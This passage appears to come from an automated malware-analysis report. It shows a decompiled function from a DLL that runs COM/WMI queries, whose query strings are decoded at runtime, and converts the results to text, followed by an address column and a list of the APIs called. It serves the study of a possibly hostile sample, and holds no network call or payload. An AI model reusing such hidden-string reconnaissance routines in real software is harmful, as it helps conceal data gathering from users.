                                                                                                                                                                                                                				char _v92;
                                                                                                                                                                                                                				char _v96;
                                                                                                                                                                                                                				intOrPtr _v100;
                                                                                                                                                                                                                				char _v104;
                                                                                                                                                                                                                				char _v616;
                                                                                                                                                                                                                				intOrPtr* _t159;
                                                                                                                                                                                                                				char _t165;
                                                                                                                                                                                                                				signed int _t166;
                                                                                                                                                                                                                				signed int _t173;
                                                                                                                                                                                                                				signed int _t178;
                                                                                                                                                                                                                				signed int _t186;
                                                                                                                                                                                                                				intOrPtr* _t187;
                                                                                                                                                                                                                				signed int _t188;
                                                                                                                                                                                                                				signed int _t192;
                                                                                                                                                                                                                				intOrPtr* _t193;
                                                                                                                                                                                                                				intOrPtr _t200;
                                                                                                                                                                                                                				intOrPtr* _t205;
                                                                                                                                                                                                                				signed int _t207;
                                                                                                                                                                                                                				signed int _t209;
                                                                                                                                                                                                                				intOrPtr* _t210;
                                                                                                                                                                                                                				intOrPtr _t212;
                                                                                                                                                                                                                				intOrPtr* _t213;
                                                                                                                                                                                                                				signed int _t214;
                                                                                                                                                                                                                				char _t217;
                                                                                                                                                                                                                				signed int _t218;
                                                                                                                                                                                                                				signed int _t219;
                                                                                                                                                                                                                				signed int _t230;
                                                                                                                                                                                                                				signed int _t235;
                                                                                                                                                                                                                				signed int _t242;
                                                                                                                                                                                                                				signed int _t243;
                                                                                                                                                                                                                				signed int _t244;
                                                                                                                                                                                                                				signed int _t245;
                                                                                                                                                                                                                				intOrPtr* _t247;
                                                                                                                                                                                                                				intOrPtr* _t251;
                                                                                                                                                                                                                				signed int _t252;
                                                                                                                                                                                                                				intOrPtr* _t253;
                                                                                                                                                                                                                				void* _t255;
                                                                                                                                                                                                                				intOrPtr* _t261;
                                                                                                                                                                                                                				signed int _t262;
                                                                                                                                                                                                                				signed int _t283;
                                                                                                                                                                                                                				signed int _t289;
                                                                                                                                                                                                                				char* _t298;
                                                                                                                                                                                                                				void* _t320;
                                                                                                                                                                                                                				signed int _t322;
                                                                                                                                                                                                                				intOrPtr* _t323;
                                                                                                                                                                                                                				intOrPtr _t324;
                                                                                                                                                                                                                				signed int _t327;
                                                                                                                                                                                                                				intOrPtr* _t328;
                                                                                                                                                                                                                				intOrPtr* _t329;
                                                                                                                                                                                                                
                                                                                                                                                                                                                				_v32 = _v32 & 0x00000000;
                                                                                                                                                                                                                				_v60 = _v60 & 0x00000000;
                                                                                                                                                                                                                				_v56 = __edx;
                                                                                                                                                                                                                				_v100 = __ecx;
                                                                                                                                                                                                                				_t159 = E1000D972(__ecx);
                                                                                                                                                                                                                				_t251 = _t159;
                                                                                                                                                                                                                				_v104 = _t251;
                                                                                                                                                                                                                				if(_t251 == 0) {
                                                                                                                                                                                                                					return _t159;
                                                                                                                                                                                                                				}
                                                                                                                                                                                                                				_t320 = E10009525(0x10);
                                                                                                                                                                                                                				_v36 = _t320;
                                                                                                                                                                                                                				_pop(_t255);
                                                                                                                                                                                                                				if(_t320 == 0) {
                                                                                                                                                                                                                					L53:
                                                                                                                                                                                                                					E1000953B( &_v60, 0xfffffffe);
                                                                                                                                                                                                                					E1000DA26( &_v104);
                                                                                                                                                                                                                					return _t320;
                                                                                                                                                                                                                				}
                                                                                                                                                                                                                				_t165 = E1000948D(_t255, 0x578);
                                                                                                                                                                                                                				 *_t328 = 0x9c5;
                                                                                                                                                                                                                				_v52 = _t165;
                                                                                                                                                                                                                				_t166 = E1000948D(_t255);
                                                                                                                                                                                                                				_push(0);
                                                                                                                                                                                                                				_push(_v56);
                                                                                                                                                                                                                				_v20 = _t166;
                                                                                                                                                                                                                				_push(_t166);
                                                                                                                                                                                                                				_push(_a4);
                                                                                                                                                                                                                				_t322 = E10009DC8(_t165);
                                                                                                                                                                                                                				_v60 = _t322;
                                                                                                                                                                                                                				E1000A291( &_v52);
                                                                                                                                                                                                                				E1000A291( &_v20);
                                                                                                                                                                                                                				_t329 = _t328 + 0x20;
                                                                                                                                                                                                                				if(_t322 != 0) {
                                                                                                                                                                                                                					_t323 = __imp__#2;
                                                                                                                                                                                                                					_v40 =  *_t323(_t322);
                                                                                                                                                                                                                					_t173 = E1000948D(_t255, 0xa70);
                                                                                                                                                                                                                					_v20 = _t173;
                                                                                                                                                                                                                					_v52 =  *_t323(_t173);
                                                                                                                                                                                                                					E1000A291( &_v20);
                                                                                                                                                                                                                					_t324 = _v40;
                                                                                                                                                                                                                					_t261 =  *_t251;
                                                                                                                                                                                                                					_t252 = 0;
                                                                                                                                                                                                                					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
                                                                                                                                                                                                                					__eflags = _t178;
                                                                                                                                                                                                                					if(_t178 != 0) {
                                                                                                                                                                                                                						L52:
                                                                                                                                                                                                                						__imp__#6(_t324);
                                                                                                                                                                                                                						__imp__#6(_v52);
                                                                                                                                                                                                                						goto L53;
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                					_t262 = _v32;
                                                                                                                                                                                                                					_v28 = 0;
                                                                                                                                                                                                                					_v20 = 0;
                                                                                                                                                                                                                					__eflags = _t262;
                                                                                                                                                                                                                					if(_t262 == 0) {
                                                                                                                                                                                                                						L49:
                                                                                                                                                                                                                						 *((intOrPtr*)( *_t262 + 8))(_t262);
                                                                                                                                                                                                                						__eflags = _t252;
                                                                                                                                                                                                                						if(_t252 == 0) {
                                                                                                                                                                                                                							E1000953B( &_v36, 0);
                                                                                                                                                                                                                							_t320 = _v36;
                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                							 *(_t320 + 8) = _t252;
                                                                                                                                                                                                                							 *_t320 = E10009C2B(_v100);
                                                                                                                                                                                                                							 *((intOrPtr*)(_t320 + 4)) = E10009C2B(_v56);
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                						goto L52;
                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                						goto L6;
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                					while(1) {
                                                                                                                                                                                                                						L6:
                                                                                                                                                                                                                						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
                                                                                                                                                                                                                						__eflags = _t186;
                                                                                                                                                                                                                						if(_t186 != 0) {
                                                                                                                                                                                                                							break;
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                						_v16 = 0;
                                                                                                                                                                                                                						_v48 = 0;
                                                                                                                                                                                                                						_v12 = 0;
                                                                                                                                                                                                                						_v24 = 0;
                                                                                                                                                                                                                						__eflags = _v84;
                                                                                                                                                                                                                						if(_v84 == 0) {
                                                                                                                                                                                                                							break;
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                						_t187 = _v28;
                                                                                                                                                                                                                						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
                                                                                                                                                                                                                						__eflags = _t188;
                                                                                                                                                                                                                						if(_t188 >= 0) {
                                                                                                                                                                                                                							__imp__#20(_v24, 1,  &_v16);
                                                                                                                                                                                                                							__imp__#19(_v24, 1,  &_v48);
                                                                                                                                                                                                                							_t46 = _t320 + 0xc; // 0xc
                                                                                                                                                                                                                							_t253 = _t46;
                                                                                                                                                                                                                							_t327 = _t252 << 3;
                                                                                                                                                                                                                							_t47 = _t327 + 8; // 0x8
                                                                                                                                                                                                                							_t192 = E100095B9(_t327, _t47);
                                                                                                                                                                                                                							__eflags = _t192;
                                                                                                                                                                                                                							if(_t192 == 0) {
                                                                                                                                                                                                                								__imp__#16(_v24);
                                                                                                                                                                                                                								_t193 = _v28;
                                                                                                                                                                                                                								 *((intOrPtr*)( *_t193 + 8))(_t193);
                                                                                                                                                                                                                								L46:
                                                                                                                                                                                                                								_t252 = _v20;
                                                                                                                                                                                                                								break;
                                                                                                                                                                                                                							}
                                                                                                                                                                                                                							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
                                                                                                                                                                                                                							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E10009525( *(_t327 +  *_t253) << 3);
                                                                                                                                                                                                                							_t200 =  *_t253;
                                                                                                                                                                                                                							__eflags =  *(_t327 + _t200 + 4);
                                                                                                                                                                                                                							if( *(_t327 + _t200 + 4) == 0) {
                                                                                                                                                                                                                								_t136 = _t320 + 0xc; // 0xc
                                                                                                                                                                                                                								E1000953B(_t136, 0);
                                                                                                                                                                                                                								E1000953B( &_v36, 0);
                                                                                                                                                                                                                								__imp__#16(_v24);
                                                                                                                                                                                                                								_t205 = _v28;
                                                                                                                                                                                                                								 *((intOrPtr*)( *_t205 + 8))(_t205);
                                                                                                                                                                                                                								_t320 = _v36;
                                                                                                                                                                                                                								goto L46;
                                                                                                                                                                                                                							}
                                                                                                                                                                                                                							_t207 = _v16;
                                                                                                                                                                                                                							while(1) {
                                                                                                                                                                                                                								_v12 = _t207;
                                                                                                                                                                                                                								__eflags = _t207 - _v48;
                                                                                                                                                                                                                								if(_t207 > _v48) {
                                                                                                                                                                                                                									break;
                                                                                                                                                                                                                								}
                                                                                                                                                                                                                								_v44 = _v44 & 0x00000000;
                                                                                                                                                                                                                								_t209 =  &_v12;
                                                                                                                                                                                                                								__imp__#25(_v24, _t209,  &_v44);
                                                                                                                                                                                                                								__eflags = _t209;
                                                                                                                                                                                                                								if(_t209 < 0) {
                                                                                                                                                                                                                									break;
                                                                                                                                                                                                                								}
                                                                                                                                                                                                                								_t212 = E10009C2B(_v44);
                                                                                                                                                                                                                								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
                                                                                                                                                                                                                								_t213 = _v28;
                                                                                                                                                                                                                								_t281 =  *_t213;
                                                                                                                                                                                                                								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
                                                                                                                                                                                                                								__eflags = _t214;
                                                                                                                                                                                                                								if(_t214 < 0) {
                                                                                                                                                                                                                									L39:
                                                                                                                                                                                                                									__imp__#6(_v44);
                                                                                                                                                                                                                									_t207 = _v12 + 1;
                                                                                                                                                                                                                									__eflags = _t207;
                                                                                                                                                                                                                									continue;
                                                                                                                                                                                                                								}
                                                                                                                                                                                                                								_v92 = E1000948D(_t281, 0x10ee);
                                                                                                                                                                                                                								 *_t329 = 0x6bc;
                                                                                                                                                                                                                								_t217 = E1000948D(_t281);
                                                                                                                                                                                                                								_t283 = _v80;
                                                                                                                                                                                                                								_v96 = _t217;
                                                                                                                                                                                                                								_t218 = _t283 & 0x0000ffff;
                                                                                                                                                                                                                								__eflags = _t218 - 0xb;
                                                                                                                                                                                                                								if(__eflags > 0) {
                                                                                                                                                                                                                									_t219 = _t218 - 0x10;
                                                                                                                                                                                                                									__eflags = _t219;
                                                                                                                                                                                                                									if(_t219 == 0) {
                                                                                                                                                                                                                										L35:
                                                                                                                                                                                                                										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E10009525(0x18);
                                                                                                                                                                                                                										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
                                                                                                                                                                                                                										__eflags = _t289;
                                                                                                                                                                                                                										if(_t289 == 0) {
                                                                                                                                                                                                                											L38:
                                                                                                                                                                                                                											E1000A291( &_v92);
                                                                                                                                                                                                                											E1000A291( &_v96);
                                                                                                                                                                                                                											__imp__#9( &_v80);
                                                                                                                                                                                                                											goto L39;
                                                                                                                                                                                                                										}
                                                                                                                                                                                                                										_push(_v72);
                                                                                                                                                                                                                										_push(L"%d");
                                                                                                                                                                                                                										L37:
                                                                                                                                                                                                                										_push(0xc);
                                                                                                                                                                                                                										_push(_t289);
                                                                                                                                                                                                                										E1000B76A();
                                                                                                                                                                                                                										_t329 = _t329 + 0x10;
                                                                                                                                                                                                                										goto L38;
                                                                                                                                                                                                                									}
                                                                                                                                                                                                                									_t230 = _t219 - 1;
                                                                                                                                                                                                                									__eflags = _t230;
                                                                                                                                                                                                                									if(_t230 == 0) {
                                                                                                                                                                                                                										L33:
                                                                                                                                                                                                                										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E10009525(0x18);
                                                                                                                                                                                                                										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
                                                                                                                                                                                                                										__eflags = _t289;
                                                                                                                                                                                                                										if(_t289 == 0) {
                                                                                                                                                                                                                											goto L38;
                                                                                                                                                                                                                										}
                                                                                                                                                                                                                										_push(_v72);
                                                                                                                                                                                                                										_push(L"%u");
                                                                                                                                                                                                                										goto L37;
                                                                                                                                                                                                                									}
                                                                                                                                                                                                                									_t235 = _t230 - 1;
                                                                                                                                                                                                                									__eflags = _t235;
                                                                                                                                                                                                                									if(_t235 == 0) {
                                                                                                                                                                                                                										goto L33;
                                                                                                                                                                                                                									}
                                                                                                                                                                                                                									__eflags = _t235 == 1;
                                                                                                                                                                                                                									if(_t235 == 1) {
                                                                                                                                                                                                                										goto L33;
                                                                                                                                                                                                                									}
                                                                                                                                                                                                                									L28:
                                                                                                                                                                                                                									__eflags = _t283 & 0x00002000;
                                                                                                                                                                                                                									if((_t283 & 0x00002000) == 0) {
                                                                                                                                                                                                                										_v88 = E1000948D(_t283, 0x9cc);
                                                                                                                                                                                                                										E1000B76A( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
                                                                                                                                                                                                                										E1000A291( &_v88);
                                                                                                                                                                                                                										_t329 = _t329 + 0x18;
                                                                                                                                                                                                                										_t298 =  &_v616;
                                                                                                                                                                                                                										L31:
                                                                                                                                                                                                                										_t242 = E10009C2B(_t298);
                                                                                                                                                                                                                										L32:
                                                                                                                                                                                                                										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
                                                                                                                                                                                                                										goto L38;
                                                                                                                                                                                                                									}
                                                                                                                                                                                                                									_t242 = E1000DE98( &_v80);
                                                                                                                                                                                                                									goto L32;
                                                                                                                                                                                                                								}
                                                                                                                                                                                                                								if(__eflags == 0) {
                                                                                                                                                                                                                									__eflags = _v72 - 0xffff;
                                                                                                                                                                                                                									_t298 = L"TRUE";
                                                                                                                                                                                                                									if(_v72 != 0xffff) {
                                                                                                                                                                                                                										_t298 = L"FALSE";
                                                                                                                                                                                                                									}
                                                                                                                                                                                                                									goto L31;
                                                                                                                                                                                                                								}
                                                                                                                                                                                                                								_t243 = _t218 - 1;
                                                                                                                                                                                                                								__eflags = _t243;
                                                                                                                                                                                                                								if(_t243 == 0) {
                                                                                                                                                                                                                									goto L38;
                                                                                                                                                                                                                								}
                                                                                                                                                                                                                								_t244 = _t243 - 1;
                                                                                                                                                                                                                								__eflags = _t244;
                                                                                                                                                                                                                								if(_t244 == 0) {
                                                                                                                                                                                                                									goto L35;
                                                                                                                                                                                                                								}
                                                                                                                                                                                                                								_t245 = _t244 - 1;
                                                                                                                                                                                                                								__eflags = _t245;
                                                                                                                                                                                                                								if(_t245 == 0) {
                                                                                                                                                                                                                									goto L35;
                                                                                                                                                                                                                								}
                                                                                                                                                                                                                								__eflags = _t245 != 5;
                                                                                                                                                                                                                								if(_t245 != 5) {
                                                                                                                                                                                                                									goto L28;
                                                                                                                                                                                                                								}
                                                                                                                                                                                                                								_t298 = _v72;
                                                                                                                                                                                                                								goto L31;
                                                                                                                                                                                                                							}
                                                                                                                                                                                                                							__imp__#16(_v24);
                                                                                                                                                                                                                							_t210 = _v28;
                                                                                                                                                                                                                							 *((intOrPtr*)( *_t210 + 8))(_t210);
                                                                                                                                                                                                                							_t252 = _v20;
                                                                                                                                                                                                                							L42:
                                                                                                                                                                                                                							_t262 = _v32;
                                                                                                                                                                                                                							_t252 = _t252 + 1;
                                                                                                                                                                                                                							_v20 = _t252;
                                                                                                                                                                                                                							__eflags = _t262;
                                                                                                                                                                                                                							if(_t262 != 0) {
                                                                                                                                                                                                                								continue;
                                                                                                                                                                                                                							}
                                                                                                                                                                                                                							L48:
                                                                                                                                                                                                                							_t324 = _v40;
                                                                                                                                                                                                                							goto L49;
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                						_t247 = _v28;
                                                                                                                                                                                                                						 *((intOrPtr*)( *_t247 + 8))(_t247);
                                                                                                                                                                                                                						goto L42;
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                					_t262 = _v32;
                                                                                                                                                                                                                					goto L48;
                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                					E1000953B( &_v36, _t322);
                                                                                                                                                                                                                					_t320 = _v36;
                                                                                                                                                                                                                					goto L53;
                                                                                                                                                                                                                				}
                                                                                                                                                                                                                			}





































































                                                                                                                                                                                                                0x1000dfbd
                                                                                                                                                                                                                0x1000dfc3
                                                                                                                                                                                                                0x1000dfca
                                                                                                                                                                                                                0x1000dfcd
                                                                                                                                                                                                                0x1000dfd0
                                                                                                                                                                                                                0x1000dfd5
                                                                                                                                                                                                                0x1000dfd7
                                                                                                                                                                                                                0x1000dfdc
                                                                                                                                                                                                                0x1000e424
                                                                                                                                                                                                                0x1000e424
                                                                                                                                                                                                                0x1000dfe9
                                                                                                                                                                                                                0x1000dfeb
                                                                                                                                                                                                                0x1000dfee
                                                                                                                                                                                                                0x1000dff1
                                                                                                                                                                                                                0x1000e409
                                                                                                                                                                                                                0x1000e40f
                                                                                                                                                                                                                0x1000e419
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000e41e
                                                                                                                                                                                                                0x1000dffc
                                                                                                                                                                                                                0x1000e003
                                                                                                                                                                                                                0x1000e00a
                                                                                                                                                                                                                0x1000e00d
                                                                                                                                                                                                                0x1000e012
                                                                                                                                                                                                                0x1000e014
                                                                                                                                                                                                                0x1000e017
                                                                                                                                                                                                                0x1000e01a
                                                                                                                                                                                                                0x1000e01b
                                                                                                                                                                                                                0x1000e024
                                                                                                                                                                                                                0x1000e02a
                                                                                                                                                                                                                0x1000e02d
                                                                                                                                                                                                                0x1000e036
                                                                                                                                                                                                                0x1000e03b
                                                                                                                                                                                                                0x1000e040
                                                                                                                                                                                                                0x1000e057
                                                                                                                                                                                                                0x1000e064
                                                                                                                                                                                                                0x1000e067
                                                                                                                                                                                                                0x1000e06e
                                                                                                                                                                                                                0x1000e073
                                                                                                                                                                                                                0x1000e07a
                                                                                                                                                                                                                0x1000e07f
                                                                                                                                                                                                                0x1000e086
                                                                                                                                                                                                                0x1000e088
                                                                                                                                                                                                                0x1000e094
                                                                                                                                                                                                                0x1000e097
                                                                                                                                                                                                                0x1000e099
                                                                                                                                                                                                                0x1000e3f9
                                                                                                                                                                                                                0x1000e3fa
                                                                                                                                                                                                                0x1000e403
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000e403
                                                                                                                                                                                                                0x1000e09f
                                                                                                                                                                                                                0x1000e0a2
                                                                                                                                                                                                                0x1000e0a5
                                                                                                                                                                                                                0x1000e0a8
                                                                                                                                                                                                                0x1000e0aa
                                                                                                                                                                                                                0x1000e3c5
                                                                                                                                                                                                                0x1000e3c8
                                                                                                                                                                                                                0x1000e3cb
                                                                                                                                                                                                                0x1000e3cd
                                                                                                                                                                                                                0x1000e3ef
                                                                                                                                                                                                                0x1000e3f4
                                                                                                                                                                                                                0x1000e3cf
                                                                                                                                                                                                                0x1000e3d2
                                                                                                                                                                                                                0x1000e3dd
                                                                                                                                                                                                                0x1000e3e4
                                                                                                                                                                                                                0x1000e3e4
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000e0b0
                                                                                                                                                                                                                0x1000e0b0
                                                                                                                                                                                                                0x1000e0c2
                                                                                                                                                                                                                0x1000e0c5
                                                                                                                                                                                                                0x1000e0c7
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000e0cf
                                                                                                                                                                                                                0x1000e0d2
                                                                                                                                                                                                                0x1000e0d5
                                                                                                                                                                                                                0x1000e0d8
                                                                                                                                                                                                                0x1000e0db
                                                                                                                                                                                                                0x1000e0de
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000e0e4
                                                                                                                                                                                                                0x1000e0f2
                                                                                                                                                                                                                0x1000e0f5
                                                                                                                                                                                                                0x1000e0f7
                                                                                                                                                                                                                0x1000e110
                                                                                                                                                                                                                0x1000e11f
                                                                                                                                                                                                                0x1000e127
                                                                                                                                                                                                                0x1000e127
                                                                                                                                                                                                                0x1000e12a
                                                                                                                                                                                                                0x1000e131
                                                                                                                                                                                                                0x1000e135
                                                                                                                                                                                                                0x1000e13b
                                                                                                                                                                                                                0x1000e13d
                                                                                                                                                                                                                0x1000e3ad
                                                                                                                                                                                                                0x1000e3b3
                                                                                                                                                                                                                0x1000e3b9
                                                                                                                                                                                                                0x1000e3bc
                                                                                                                                                                                                                0x1000e3bc
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000e3bc
                                                                                                                                                                                                                0x1000e14c
                                                                                                                                                                                                                0x1000e160
                                                                                                                                                                                                                0x1000e164
                                                                                                                                                                                                                0x1000e166
                                                                                                                                                                                                                0x1000e16b
                                                                                                                                                                                                                0x1000e37a
                                                                                                                                                                                                                0x1000e380
                                                                                                                                                                                                                0x1000e38b
                                                                                                                                                                                                                0x1000e396
                                                                                                                                                                                                                0x1000e39c
                                                                                                                                                                                                                0x1000e3a2
                                                                                                                                                                                                                0x1000e3a5
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000e3a5
                                                                                                                                                                                                                0x1000e171
                                                                                                                                                                                                                0x1000e348
                                                                                                                                                                                                                0x1000e348
                                                                                                                                                                                                                0x1000e34b
                                                                                                                                                                                                                0x1000e34e
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000e179
                                                                                                                                                                                                                0x1000e181
                                                                                                                                                                                                                0x1000e188
                                                                                                                                                                                                                0x1000e18e
                                                                                                                                                                                                                0x1000e190
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000e199
                                                                                                                                                                                                                0x1000e1ae
                                                                                                                                                                                                                0x1000e1b4
                                                                                                                                                                                                                0x1000e1bd
                                                                                                                                                                                                                0x1000e1c0
                                                                                                                                                                                                                0x1000e1c3
                                                                                                                                                                                                                0x1000e1c5
                                                                                                                                                                                                                0x1000e33b
                                                                                                                                                                                                                0x1000e33e
                                                                                                                                                                                                                0x1000e347
                                                                                                                                                                                                                0x1000e347
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000e347
                                                                                                                                                                                                                0x1000e1d5
                                                                                                                                                                                                                0x1000e1d8
                                                                                                                                                                                                                0x1000e1df
                                                                                                                                                                                                                0x1000e1e5
                                                                                                                                                                                                                0x1000e1e8
                                                                                                                                                                                                                0x1000e1eb
                                                                                                                                                                                                                0x1000e1ee
                                                                                                                                                                                                                0x1000e1f1
                                                                                                                                                                                                                0x1000e22d
                                                                                                                                                                                                                0x1000e22d
                                                                                                                                                                                                                0x1000e230
                                                                                                                                                                                                                0x1000e2dc
                                                                                                                                                                                                                0x1000e2f0
                                                                                                                                                                                                                0x1000e300
                                                                                                                                                                                                                0x1000e304
                                                                                                                                                                                                                0x1000e306
                                                                                                                                                                                                                0x1000e31d
                                                                                                                                                                                                                0x1000e321
                                                                                                                                                                                                                0x1000e32a
                                                                                                                                                                                                                0x1000e335
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000e335
                                                                                                                                                                                                                0x1000e30c
                                                                                                                                                                                                                0x1000e30d
                                                                                                                                                                                                                0x1000e312
                                                                                                                                                                                                                0x1000e312
                                                                                                                                                                                                                0x1000e314
                                                                                                                                                                                                                0x1000e315
                                                                                                                                                                                                                0x1000e31a
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000e31a
                                                                                                                                                                                                                0x1000e236
                                                                                                                                                                                                                0x1000e236
                                                                                                                                                                                                                0x1000e239
                                                                                                                                                                                                                0x1000e2a4
                                                                                                                                                                                                                0x1000e2b8
                                                                                                                                                                                                                0x1000e2c8
                                                                                                                                                                                                                0x1000e2cc
                                                                                                                                                                                                                0x1000e2ce
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000e2d4
                                                                                                                                                                                                                0x1000e2d5
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000e2d5
                                                                                                                                                                                                                0x1000e23b
                                                                                                                                                                                                                0x1000e23b
                                                                                                                                                                                                                0x1000e23e
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000e240
                                                                                                                                                                                                                0x1000e243
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000e245
                                                                                                                                                                                                                0x1000e245
                                                                                                                                                                                                                0x1000e24b
                                                                                                                                                                                                                0x1000e267
                                                                                                                                                                                                                0x1000e276
                                                                                                                                                                                                                0x1000e27f
                                                                                                                                                                                                                0x1000e284
                                                                                                                                                                                                                0x1000e287
                                                                                                                                                                                                                0x1000e28d
                                                                                                                                                                                                                0x1000e28d
                                                                                                                                                                                                                0x1000e292
                                                                                                                                                                                                                0x1000e29e
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000e29e
                                                                                                                                                                                                                0x1000e250
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000e250
                                                                                                                                                                                                                0x1000e1f3
                                                                                                                                                                                                                0x1000e21a
                                                                                                                                                                                                                0x1000e21f
                                                                                                                                                                                                                0x1000e224
                                                                                                                                                                                                                0x1000e226
                                                                                                                                                                                                                0x1000e226
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000e224
                                                                                                                                                                                                                0x1000e1f5
                                                                                                                                                                                                                0x1000e1f5
                                                                                                                                                                                                                0x1000e1f8
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000e1fe
                                                                                                                                                                                                                0x1000e1fe
                                                                                                                                                                                                                0x1000e201
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000e207
                                                                                                                                                                                                                0x1000e207
                                                                                                                                                                                                                0x1000e20a
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000e210
                                                                                                                                                                                                                0x1000e213
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000e215
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000e215
                                                                                                                                                                                                                0x1000e357
                                                                                                                                                                                                                0x1000e35d
                                                                                                                                                                                                                0x1000e363
                                                                                                                                                                                                                0x1000e366
                                                                                                                                                                                                                0x1000e369
                                                                                                                                                                                                                0x1000e369
                                                                                                                                                                                                                0x1000e36c
                                                                                                                                                                                                                0x1000e36d
                                                                                                                                                                                                                0x1000e370
                                                                                                                                                                                                                0x1000e372
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000e3c2
                                                                                                                                                                                                                0x1000e3c2
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000e3c2
                                                                                                                                                                                                                0x1000e0f9
                                                                                                                                                                                                                0x1000e0ff
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000e0ff
                                                                                                                                                                                                                0x1000e3bf
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000e042
                                                                                                                                                                                                                0x1000e047
                                                                                                                                                                                                                0x1000e04c
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000e050

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 1000D972: CoInitializeEx.OLE32(00000000,00000000,00000000,00000000,00000000,00000000,?,1000DCA3,000010FB,00000000,00000000,00000005), ref: 1000D985
                                                                                                                                                                                                                  • Part of subcall function 1000D972: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,1000DCA3,000010FB,00000000,00000000,00000005), ref: 1000D996
                                                                                                                                                                                                                  • Part of subcall function 1000D972: CoCreateInstance.OLE32(1001D928,00000000,00000001,1001D938,00000000,?,1000DCA3,000010FB,00000000,00000000,00000005), ref: 1000D9AD
                                                                                                                                                                                                                  • Part of subcall function 1000D972: SysAllocString.OLEAUT32(00000000), ref: 1000D9B8
                                                                                                                                                                                                                  • Part of subcall function 1000D972: CoSetProxyBlanket.OLE32(00000005,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,1000DCA3,000010FB,00000000,00000000,00000005), ref: 1000D9E3
                                                                                                                                                                                                                  • Part of subcall function 10009525: RtlAllocateHeap.NTDLL(00000008,?,?,1000990B,00000100,00000001,100010BC), ref: 10009533
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 1000E05D
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 1000E071
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 1000E3FA
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 1000E403
                                                                                                                                                                                                                  • Part of subcall function 1000953B: HeapFree.KERNEL32(00000000,00000000), ref: 10009581
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
